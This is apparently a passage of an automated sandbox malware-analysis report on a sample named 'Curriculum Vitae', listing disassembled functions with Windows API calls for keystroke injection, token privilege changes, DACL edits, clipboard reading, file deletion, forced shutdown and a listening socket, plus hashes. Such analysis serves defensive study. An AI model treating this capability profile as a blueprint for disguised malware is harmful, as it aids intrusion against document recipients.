                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F4D6
                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D8F4DE
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F4E1
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F4F6
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F501
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F50B
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F510
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F519
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F51E
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F528
                      • keybd_event.USER32(00000012,00000000), ref: 00D8F52D
                      • SetForegroundWindow.USER32(00000000), ref: 00D8F530
                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D8F557
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: 6ec568b273d70c27237549b05e395308427613993a7df2502f12efc7abddaab3
                      • Instruction ID: ae5db7eea7e9ba44a6e807c2e0d501b53d6093ce2219d3663554610526dbd373
                      • Opcode Fuzzy Hash: 6ec568b273d70c27237549b05e395308427613993a7df2502f12efc7abddaab3
                      • Instruction Fuzzy Hash: 17315271A50319BBEB206BB59C4AFBF7E6CEB44B50F141066F705E62D1C6B09D01AB70
                      Function 00D91201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                        • Part of subcall function 00D916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                        • Part of subcall function 00D916C3: GetLastError.KERNEL32 ref: 00D9174A
                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00D91286
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00D912A8
                      • CloseHandle.KERNEL32(?), ref: 00D912B9
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00D912D1
                      • GetProcessWindowStation.USER32 ref: 00D912EA
                      • SetProcessWindowStation.USER32(00000000), ref: 00D912F4
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00D91310
                        • Part of subcall function 00D910BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D911FC), ref: 00D910D4
                        • Part of subcall function 00D910BF: CloseHandle.KERNEL32(?,?,00D911FC), ref: 00D910E9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                      • String ID: $default$winsta0
                      • API String ID: 22674027-1027155976
                      • Opcode ID: 9debba7183fe595229152ac9698ea73780b7cc2edcd52dfa2d7ddf6257856d90
                      • Instruction ID: 921ca5e27c08e5f2b27626dba184a8cf1ddeef238b5f1869030cb0af72867457
                      • Opcode Fuzzy Hash: 9debba7183fe595229152ac9698ea73780b7cc2edcd52dfa2d7ddf6257856d90
                      • Instruction Fuzzy Hash: 3281677590030AABEF219FA4DC49FEE7BB9EF08704F184129FA15E62A0C7318955CB30
                      Function 00D90B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D91114
                        • Part of subcall function 00D910F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91120
                        • Part of subcall function 00D910F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D9112F
                        • Part of subcall function 00D910F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D90B9B,?,?,?), ref: 00D91136
                        • Part of subcall function 00D910F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D9114D
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D90BCC
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D90C00
                      • GetLengthSid.ADVAPI32(?), ref: 00D90C17
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D90C51
                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D90C6D
                      • GetLengthSid.ADVAPI32(?), ref: 00D90C84
                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D90C8C
                      • HeapAlloc.KERNEL32(00000000), ref: 00D90C93
                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D90CB4
                      • CopySid.ADVAPI32(00000000), ref: 00D90CBB
                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D90CEA
                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D90D0C
                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D90D1E
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D45
                      • HeapFree.KERNEL32(00000000), ref: 00D90D4C
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D55
                      • HeapFree.KERNEL32(00000000), ref: 00D90D5C
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D90D65
                      • HeapFree.KERNEL32(00000000), ref: 00D90D6C
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D90D78
                      • HeapFree.KERNEL32(00000000), ref: 00D90D7F
                        • Part of subcall function 00D91193: GetProcessHeap.KERNEL32(00000008,00D90BB1,?,00000000,?,00D90BB1,?), ref: 00D911A1
                        • Part of subcall function 00D91193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D90BB1,?), ref: 00D911A8
                        • Part of subcall function 00D91193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D90BB1,?), ref: 00D911B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                      • String ID:
                      • API String ID: 4175595110-0
                      • Opcode ID: 06e8f4873eac8dbaea2627b224fa99a4269db203fe48ec9695cc90de234315d1
                      • Instruction ID: 9d48b2d423db71536cc8234af45eddb193557a5c3054d1fb651e8dd58ee1b155
                      • Opcode Fuzzy Hash: 06e8f4873eac8dbaea2627b224fa99a4269db203fe48ec9695cc90de234315d1
                      • Instruction Fuzzy Hash: D6712976A0020AAFDF109FA5EC44FEEBBBCBF04314F184515EA19E6291D771A905CB70
                      Function 00DAEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                      Download Yara Rule
                      APIs
                      • OpenClipboard.USER32(00DCCC08), ref: 00DAEB29
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00DAEB37
                      • GetClipboardData.USER32(0000000D), ref: 00DAEB43
                      • CloseClipboard.USER32 ref: 00DAEB4F
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEB87
                      • CloseClipboard.USER32 ref: 00DAEB91
                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00DAEBBC
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00DAEBC9
                      • GetClipboardData.USER32(00000001), ref: 00DAEBD1
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEBE2
                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00DAEC22
                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00DAEC38
                      • GetClipboardData.USER32(0000000F), ref: 00DAEC44
                      • GlobalLock.KERNEL32(00000000), ref: 00DAEC55
                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00DAEC77
                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DAEC94
                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00DAECD2
                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00DAECF3
                      • CountClipboardFormats.USER32 ref: 00DAED14
                      • CloseClipboard.USER32 ref: 00DAED59
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                      • String ID:
                      • API String ID: 420908878-0
                      • Opcode ID: a0cd016e25bd20af5bd12bf3254f306181518913759fa60b9d055e53da96d49f
                      • Instruction ID: 16170b850bfdfdd225957bf8500741791cba02e5993a9df66fbc3662422a69da
                      • Opcode Fuzzy Hash: a0cd016e25bd20af5bd12bf3254f306181518913759fa60b9d055e53da96d49f
                      • Instruction Fuzzy Hash: 2161BB34204302AFD700EF24D898F6AB7A4EF85714F18551DF59AD72A2DB71E906CBB2
                      Function 00DA698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA69BE
                      • FindClose.KERNEL32(00000000), ref: 00DA6A12
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DA6A4E
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DA6A75
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA6AB2
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00DA6ADF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                      • API String ID: 3830820486-3289030164
                      • Opcode ID: 4ce88f02b5d15a94fc256192bc39bbb96d59c9832fd32fbbf1802a02cf916c7c
                      • Instruction ID: 36747167d6c3f21823c9f0d5a3f9fa812b8d4e67f4f003bfd246435e31d9c294
                      • Opcode Fuzzy Hash: 4ce88f02b5d15a94fc256192bc39bbb96d59c9832fd32fbbf1802a02cf916c7c
                      • Instruction Fuzzy Hash: A7D15FB2508300AFC714EBA4C995EABB7ECEF89704F04491DF589D6291EB74DA44CB72
                      Function 00DA9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DA9663
                      • GetFileAttributesW.KERNEL32(?), ref: 00DA96A1
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00DA96BB
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA96D3
                      • FindClose.KERNEL32(00000000), ref: 00DA96DE
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00DA96FA
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA974A
                      • SetCurrentDirectoryW.KERNEL32(00DF6B7C), ref: 00DA9768
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA9772
                      • FindClose.KERNEL32(00000000), ref: 00DA977F
                      • FindClose.KERNEL32(00000000), ref: 00DA978F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1409584000-438819550
                      • Opcode ID: e40c753896e58f66dbbfff0fd15df3785bf1ab0e976026b2e5ff5511c4428850
                      • Instruction ID: e61aaf0d628c70900661dee5753e788248ca2ea35de3ce44c6cdf6707a7ac575
                      • Opcode Fuzzy Hash: e40c753896e58f66dbbfff0fd15df3785bf1ab0e976026b2e5ff5511c4428850
                      • Instruction Fuzzy Hash: 9331C23250021A6EDF14EFB4EC18EEEB7ACDF4A361F184155FA09E2190DB30D9448A34
                      Function 00DA979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00DA97BE
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA9819
                      • FindClose.KERNEL32(00000000), ref: 00DA9824
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00DA9840
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA9890
                      • SetCurrentDirectoryW.KERNEL32(00DF6B7C), ref: 00DA98AE
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00DA98B8
                      • FindClose.KERNEL32(00000000), ref: 00DA98C5
                      • FindClose.KERNEL32(00000000), ref: 00DA98D5
                        • Part of subcall function 00D9DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D9DB00
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 2640511053-438819550
                      • Opcode ID: c766ba28d5c6164320865fabf5c0df5b9aad982c034ff492b4da2eacfbf99440
                      • Instruction ID: e1d9a45fdf6dc6d1e9d57d48dfd1ae0a378cc958a550c088abf2fb81797e423c
                      • Opcode Fuzzy Hash: c766ba28d5c6164320865fabf5c0df5b9aad982c034ff492b4da2eacfbf99440
                      • Instruction Fuzzy Hash: 4631A33250061A6EDF10EFB4EC58EEEB7ACDF47360F148156E958E2190DB34D9498B74
                      Function 00DA8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                      Download Yara Rule
                      APIs
                      • GetLocalTime.KERNEL32(?), ref: 00DA8257
                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DA8267
                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DA8273
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DA8310
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8324
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8356
                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DA838C
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00DA8395
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CurrentDirectoryTime$File$Local$System
                      • String ID: *.*
                      • API String ID: 1464919966-438819550
                      • Opcode ID: 2079271cea2a14c6c4c6f9e74f6be36e5936461b3074a752a14bf3e31d212002
                      • Instruction ID: bebdb168536fc76b31b92158163f0b8d738d6f0732f31130209c39d8274b4d02
                      • Opcode Fuzzy Hash: 2079271cea2a14c6c4c6f9e74f6be36e5936461b3074a752a14bf3e31d212002
                      • Instruction Fuzzy Hash: 2B6139725043459FCB10EF64C841AAEB3E8FF89314F04891AF999D7251EB35E945CBB2
                      Function 00D9D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D9D122
                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D9D1DD
                      • MoveFileW.KERNEL32(?,?), ref: 00D9D1F0
                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D9D20D
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D9D237
                        • Part of subcall function 00D9D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D9D21C,?,?), ref: 00D9D2B2
                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00D9D253
                      • FindClose.KERNEL32(00000000), ref: 00D9D264
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                      • String ID: \*.*
                      • API String ID: 1946585618-1173974218
                      • Opcode ID: 48ed22ec3cad851ad0afd23ec1a68ed43b7633c92cda4a62ec4758a8dfb94972
                      • Instruction ID: 83ff196688c79b5da60cf02dfa34627f81c458f8017bce52cdef025a5e045dc4
                      • Opcode Fuzzy Hash: 48ed22ec3cad851ad0afd23ec1a68ed43b7633c92cda4a62ec4758a8dfb94972
                      • Instruction Fuzzy Hash: C0615B3190520DABCF05EBE4DA929EDB7B6EF55300F644165E446B71A1EB30AF09CB70
                      Function 00DAED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                      • String ID:
                      • API String ID: 1737998785-0
                      • Opcode ID: 2e0a1584ab8f5c67648f31d8758d9ebf2ce93d8dc75f3dc5dd516cc6a9586904
                      • Instruction ID: 5a8ba82be8a724f154bacf3b58d5d9b9c233bfa97c37e8e1eff3b9937cef0b19
                      • Opcode Fuzzy Hash: 2e0a1584ab8f5c67648f31d8758d9ebf2ce93d8dc75f3dc5dd516cc6a9586904
                      • Instruction Fuzzy Hash: AA419A35204612AFE720DF15D888F19BBE1EF45329F18D499E4598B762C735ED42CBA0
                      Function 00D9E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D916C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D9170D
                        • Part of subcall function 00D916C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D9173A
                        • Part of subcall function 00D916C3: GetLastError.KERNEL32 ref: 00D9174A
                      • ExitWindowsEx.USER32(?,00000000), ref: 00D9E932
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                      • String ID: $ $@$SeShutdownPrivilege
                      • API String ID: 2234035333-3163812486
                      • Opcode ID: bb28375fb786e962d6556001d20c922414c45c701cf43e30f17d15f48f127806
                      • Instruction ID: 21cf9b3fdcd29d0740efb8c9e92a806ee59e16e0db9e6d0f40e09ed11504ba52
                      • Opcode Fuzzy Hash: bb28375fb786e962d6556001d20c922414c45c701cf43e30f17d15f48f127806
                      • Instruction Fuzzy Hash: 5801D672A20312BFEF64A7B49C86FBB736CE714750F194521FD03E21D2D9A19C4089B4
                      Function 00DB1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                      Download Yara Rule
                      APIs
                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00DB1276
                      • WSAGetLastError.WSOCK32 ref: 00DB1283
                      • bind.WSOCK32(00000000,?,00000010), ref: 00DB12BA
                      • WSAGetLastError.WSOCK32 ref: 00DB12C5
                      • closesocket.WSOCK32(00000000), ref: 00DB12F4
                      • listen.WSOCK32(00000000,00000005), ref: 00DB1303
                      • WSAGetLastError.WSOCK32 ref: 00DB130D
                      • closesocket.WSOCK32(00000000), ref: 00DB133C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$closesocket$bindlistensocket
                      • String ID:
                      • API String ID: 540024437-0
                      • Opcode ID: 7bcb8f516045a6a0aeb57a5f58a43dd3ab0bf5786e69e48a53112fa139e6cdad
                      • Instruction ID: b1fdc2598abc43043ee07cee94025e8e4e6aa4f9bebbc0384fe8f472a46d72bb
                      • Opcode Fuzzy Hash: 7bcb8f516045a6a0aeb57a5f58a43dd3ab0bf5786e69e48a53112fa139e6cdad
                      • Instruction Fuzzy Hash: 14418D35A00201DFD710DF24C499B6ABBE5AF86318F588198E95A9F392C771ED81CBF1
                      Function 00D6B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • _free.LIBCMT ref: 00D6B9D4
                      • _free.LIBCMT ref: 00D6B9F8
                      • _free.LIBCMT ref: 00D6BB7F
                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DD3700), ref: 00D6BB91
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D6BC09
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00E01270,000000FF,?,0000003F,00000000,?), ref: 00D6BC36
